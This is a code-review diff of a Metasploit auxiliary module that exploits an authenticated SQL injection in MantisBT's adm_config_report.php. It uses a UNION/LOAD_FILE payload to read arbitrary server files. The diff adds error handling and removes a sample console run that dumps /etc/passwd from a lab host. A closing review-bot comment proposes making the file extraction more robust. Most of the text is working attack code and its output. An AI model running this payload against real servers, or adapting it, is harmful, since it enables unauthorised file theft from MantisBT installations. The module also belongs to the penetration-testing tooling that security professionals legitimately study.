|
1 | 1 | ## |
2 | | -# This file is part of the Metasploit Framework and may be subject to |
3 | | -# redistribution and commercial restrictions. Please see the Metasploit |
4 | | -# Framework web site for more information on licensing and terms of use. |
5 | | -# http://metasploit.com/framework/ |
6 | | -## |
| 2 | +## This module requires Metasploit: http//metasploit.com/download |
| 3 | +## Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +### |
7 | 5 |
|
8 | 6 | require 'msf/core' |
9 | 7 |
|
10 | | -class Metasploit3 < Msf::Auxiliary |
| 8 | +class Metasploit4 < Msf::Auxiliary |
11 | 9 | Rank = GoodRanking |
12 | 10 |
|
13 | 11 | include Msf::Exploit::Remote::HttpClient |
@@ -60,121 +58,47 @@ def run |
60 | 58 | 'vars_post' => post |
61 | 59 | }) |
62 | 60 |
|
| 61 | + if !resp or !resp.body |
| 62 | + fail_with("Error in server response. Ensure the server IP is correct.") |
| 63 | + end |
| 64 | + |
63 | 65 | cookie = resp.get_cookies |
64 | 66 |
|
| 67 | + if cookie == '' |
| 68 | + fail_with("Authentication failed") |
| 69 | + end |
| 70 | + |
65 | 71 | filepath = datastore['FILEPATH'].unpack("H*")[0] |
66 | 72 |
|
| 73 | + payload = "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27" |
| 74 | + payload << "+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE" |
| 75 | + payload << "%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter" |
| 76 | + |
67 | 77 | resp = send_request_cgi({ |
68 | 78 | 'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'), |
69 | 79 | 'method' => 'POST', |
70 | | - 'data' => "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter", |
| 80 | + 'data' => payload, |
71 | 81 | 'cookie' => cookie, |
72 | 82 | }) |
73 | 83 |
|
74 | | - resp.body =~ /qgjuq(.*)qirpq/ |
| 84 | + if !resp or !resp.body |
| 85 | + fail_with("Error in server response") |
| 86 | + end |
75 | 87 |
|
76 | | - file = [$1].pack("H*") |
| 88 | + #qgjuq is prepended to the result of the sql injection |
| 89 | + #qirpq is appended to the result of the sql injection |
| 90 | + #This allows the use of a simple regex to grab the contents |
| 91 | + #of the file easily from the page source. |
| 92 | + file = /qgjuq(.*)qirpq/.match(resp.body) |
| 93 | + |
| 94 | + file = file[0].gsub('qgjuq', '').gsub('qirpq', '') |
| 95 | + file = [file].pack("H*") |
77 | 96 |
|
78 | 97 | path = store_loot("mantisbt.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH']) |
79 | | - print_good("File saved to: #{path}") |
| 98 | + |
| 99 | + if path and path != '' |
| 100 | + print_good("File saved to: #{path}") |
| 101 | + end |
80 | 102 | end |
81 | 103 | end |
82 | 104 |
|
83 | | -__END__ |
84 | | -bperry@ubuntu:~/tools/metasploit-framework$ ./msfconsole |
85 | | -Call trans opt: received. 2-19-98 13:24:18 REC:Loc |
86 | | - |
87 | | - Trace program: running |
88 | | - |
89 | | - wake up, Neo... |
90 | | - the matrix has you |
91 | | - follow the white rabbit. |
92 | | - |
93 | | - knock, knock, Neo. |
94 | | - |
95 | | - (`. ,-, |
96 | | - ` `. ,;' / |
97 | | - `. ,'/ .' |
98 | | - `. X /.' |
99 | | - .-;--''--.._` ` ( |
100 | | - .' / ` |
101 | | - , ` ' Q ' |
102 | | - , , `._ \ |
103 | | - ,.| ' `-.;_' |
104 | | - : . ` ; ` ` --,.._; |
105 | | - ' ` , ) .' |
106 | | - `._ , ' /_ |
107 | | - ; ,''-,;' ``- |
108 | | - ``-..__``--` |
109 | | - |
110 | | - http://metasploit.pro |
111 | | - |
112 | | - |
113 | | - =[ metasploit v4.8.0-dev [core:4.8 api:1.0] |
114 | | -+ -- --=[ 1178 exploits - 649 auxiliary - 186 post |
115 | | -+ -- --=[ 312 payloads - 30 encoders - 8 nops |
116 | | - |
117 | | -msf > use auxiliary/gather/mantisbt_admin_sqli |
118 | | -msf auxiliary(mantisbt_admin_sqli) > set RHOST 172.31.16.109 |
119 | | -RHOST => 172.31.16.109 |
120 | | -msf auxiliary(mantisbt_admin_sqli) > set TARGETURI /mantisbt-1.2.16/ |
121 | | -TARGETURI => /mantisbt-1.2.16/ |
122 | | -msf auxiliary(mantisbt_admin_sqli) > set PASSWORD password |
123 | | -PASSWORD => password |
124 | | -msf auxiliary(mantisbt_admin_sqli) > show options |
125 | | - |
126 | | -Module options (auxiliary/gather/mantisbt_admin_sqli): |
127 | | - |
128 | | - Name Current Setting Required Description |
129 | | - ---- --------------- -------- ----------- |
130 | | - FILE /etc/passwd yes Path to remote file |
131 | | - PASSWORD password yes Single password |
132 | | - Proxies no Use a proxy chain |
133 | | - RHOST 172.31.16.109 yes The target address |
134 | | - RPORT 80 yes The target port |
135 | | - TARGETURI /mantisbt-1.2.16/ yes Relative URI of MantisBT installation |
136 | | - USERNAME administrator yes Single username |
137 | | - VHOST no HTTP server virtual host |
138 | | - |
139 | | -msf auxiliary(mantisbt_admin_sqli) > run |
140 | | - |
141 | | -[+] root:x:0:0:root:/root:/bin/bash |
142 | | -daemon:x:1:1:daemon:/usr/sbin:/bin/sh |
143 | | -bin:x:2:2:bin:/bin:/bin/sh |
144 | | -sys:x:3:3:sys:/dev:/bin/sh |
145 | | -sync:x:4:65534:sync:/bin:/bin/sync |
146 | | -games:x:5:60:games:/usr/games:/bin/sh |
147 | | -man:x:6:12:man:/var/cache/man:/bin/sh |
148 | | -lp:x:7:7:lp:/var/spool/lpd:/bin/sh |
149 | | -mail:x:8:8:mail:/var/mail:/bin/sh |
150 | | -news:x:9:9:news:/var/spool/news:/bin/sh |
151 | | -uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh |
152 | | -proxy:x:13:13:proxy:/bin:/bin/sh |
153 | | -www-data:x:33:33:www-data:/var/www:/bin/sh |
154 | | -backup:x:34:34:backup:/var/backups:/bin/sh |
155 | | -list:x:38:38:Mailing List Manager:/var/list:/bin/sh |
156 | | -irc:x:39:39:ircd:/var/run/ircd:/bin/sh |
157 | | -gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh |
158 | | -nobody:x:65534:65534:nobody:/nonexistent:/bin/sh |
159 | | -libuuid:x:100:101::/var/lib/libuuid:/bin/sh |
160 | | -syslog:x:101:103::/home/syslog:/bin/false |
161 | | -messagebus:x:102:104::/var/run/dbus:/bin/false |
162 | | -bperry:x:1000:1000:Brandon Perry,,,:/home/bperry:/bin/bash |
163 | | -avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false |
164 | | -usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false |
165 | | -dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/bin/false |
166 | | -whoopsie:x:106:114::/nonexistent:/bin/false |
167 | | -avahi:x:107:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false |
168 | | -colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false |
169 | | -kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false |
170 | | -pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false |
171 | | -rtkit:x:111:121:RealtimeKit,,,:/proc:/bin/false |
172 | | -saned:x:112:122::/home/saned:/bin/false |
173 | | -speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh |
174 | | -lightdm:x:114:123:Light Display Manager:/var/lib/lightdm:/bin/false |
175 | | -hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false |
176 | | -mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false |
177 | | - |
178 | | -[*] Auxiliary module execution completed |
179 | | -msf auxiliary(mantisbt_admin_sqli) > |
180 | | - |
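Review bot: `file = /qgjuq(.*)qirpq/.match(resp.body)` on new line 92 returns nil whenever the marker strings are not in the page (wrong TARGETURI, a non-vulnerable version, an error page instead of the report), so `file[0]` on line 94 raises NoMethodError rather than ending the module cleanly; the `!resp.body` check added just above does not cover this case. The marker text is already a capture group, so the two gsub calls are also redundant: `match = /qgjuq(.*)qirpq/.match(resp.body)` / `fail_with("Could not find file contents in response") unless match` / `file = [match[1]].pack("H*")`. The enclosing `run` method begins before this hunk.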